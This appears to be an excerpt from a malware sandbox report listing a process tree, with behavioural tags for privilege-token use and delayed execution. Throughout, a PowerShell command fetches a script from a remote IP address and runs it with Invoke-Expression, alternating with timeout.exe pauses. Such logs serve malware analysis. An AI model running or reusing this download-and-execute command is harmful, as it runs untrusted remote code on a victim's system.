powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4012

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:628

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3220

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4396

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1672

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4684

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3556

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1960

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2612

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1040

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3940

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:2448

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4828

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4880

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1160

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4544

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4400

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:992

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4708

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4052

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:832

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4492

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4040

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1304

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1744

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1124

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5076

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1492

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2356

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2972

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2388

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:800

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:460

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4228

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4996

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:212

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4456

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:5044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:876

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3992

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5036

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3580

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4032

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:2176

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2856

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1188

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:5088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2000

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3608

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:208

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4372

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3444

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4500

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1560

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4780

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:528

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1040

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:444

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:5060

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5024

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:3636

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3632

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2880

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:3420

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4544

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:3376

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2940

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:1668

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4756

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:320

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1012

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:4524

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2916

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:116

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1124

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:4876

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2332

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:4264

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2788

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:3660

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:5048

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:528

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:2860

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:1164

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:2828

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:4936

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3840

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3168

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:5028

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3128

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4544

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:2052

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2940

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1628

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4708

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1556

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1724

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:2692

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4040

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3996

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4112

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1604

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:5076

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3872

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:3500

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:4840

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3040

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:3408

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2804

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1140

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2976

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:1164

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2172

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:4880

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2668

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:2880

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:876

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:2228

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:752

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:4356

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4756

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:5016

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:968

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:4524

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4804

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:4612

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2492

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:4664

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4528

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:1828

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2820

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1608

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2196

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:2148

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4532

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:5056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:904

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2072

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:4172

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4936

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:4088

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4360

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:2164

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:820

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:1748

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4520

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1628

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4988

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1592

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3652

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
PID:3624

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1596

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1796

